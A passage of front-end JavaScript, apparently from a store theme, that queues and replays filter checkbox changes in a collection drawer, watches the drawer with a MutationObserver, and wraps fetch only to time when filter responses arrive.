      input.click();                                   // fires change -> theme fetches -> markBusy
      return;
    }
  }

  document.addEventListener('change', function (e) {
    var t = e.target;
    if (!t || !t.closest || !t.closest(OC)) return;
    if (!t.matches('input[type="checkbox"], input[type="radio"]')) return;
    if (!busy) { markBusy(); return; }                 // first change: the theme handles it
    e.stopImmediatePropagation();                      // theme never sees this one...
    queue.push({ name: t.name, value: t.value, checked: t.checked });   // ...we replay it
  }, true);

  // The swap is the settle signal; debounced because it arrives as a burst of
  // mutations across every filter group.
  function watch() {
    var d = drawer();
    if (!d || !window.MutationObserver) return;
    new MutationObserver(function () {
      if (!busy) return;
      clearTimeout(settleTimer);
      settleTimer = setTimeout(settle, 200);
    }).observe(d, { childList: true, subtree: true });
  }
  if (document.readyState === 'loading') document.addEventListener('DOMContentLoaded', watch);
  else watch();

  // Backstop: if the response lands but nothing in the drawer changes (the
  // markup came back identical), settle a moment after the response instead
  // of waiting for the safety timer.
  if (window.fetch) {
    var origFetch = window.fetch;
    window.fetch = function (input) {
      var url = typeof input === 'string' ? input : (input && input.url) || '';
      var p = origFetch.apply(this, arguments);
      if (busy && /\/collections\/[^?]*\?/.test(url) && !/\.js(\?|$)/.test(url)) {
        p.then(function () {
          clearTimeout(settleTimer);
          settleTimer = setTimeout(settle, 1500);
        }).catch(function () {});
      }
      return p;
    };
  }
})();
